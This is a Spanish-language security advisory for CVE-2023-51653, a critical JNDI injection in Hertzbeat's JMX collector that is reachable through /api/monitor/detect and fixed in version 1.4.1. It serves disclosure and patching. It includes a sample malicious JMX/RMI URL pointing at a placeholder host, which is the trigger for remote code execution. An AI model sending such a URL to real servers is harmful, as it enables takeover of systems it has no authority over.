Vulnerabilidad en Hertzbeat (CVE-2023-51653)
Gravedad CVSS v3.1:
CRÍTICA
Tipo:
CWE-74
Neutralización incorrecta de elementos especiales en la salida utilizada por un componente interno (Inyección)
Fecha de publicación:
22/02/2024
Última modificación:
16/01/2025
Descripción
Hertzbeat es un sistema de monitorización en tiempo real. En la implementación de `JmxCollectImpl.java`, `JMXConnectorFactory.connect` es vulnerable a la inyección JNDI. La interfaz correspondiente es `/api/monitor/detect`. Si hay un campo URL, la dirección se utilizará de forma predeterminada. Cuando la URL es `service:jmx:rmi:///jndi/rmi://xxxxxxx:1099/localHikari`, se puede explotar para provocar la ejecución remota de código. La versión 1.4.1 contiene una solución para este problema.
Impacto
Puntuación base 3.x
9.80
Gravedad 3.x
CRÍTICA
Productos y versiones vulnerables
CPE | Desde | Hasta |
---|---|---|
cpe:2.3:a:apache:hertzbeat:*:*:*:*:*:*:*:* | 1.4.1 (excluyendo) |
Para consultar la lista completa de nombres de CPE con productos y versiones, ver esta página
Referencias a soluciones, herramientas e información
- https://github.com/dromara/hertzbeat/commit/f794b0d82be49c596c04a042976446559eb315ef
- https://github.com/dromara/hertzbeat/security/advisories/GHSA-gcmp-vf6v-59gg
- https://github.com/dromara/hertzbeat/commit/f794b0d82be49c596c04a042976446559eb315ef
- https://github.com/dromara/hertzbeat/security/advisories/GHSA-gcmp-vf6v-59gg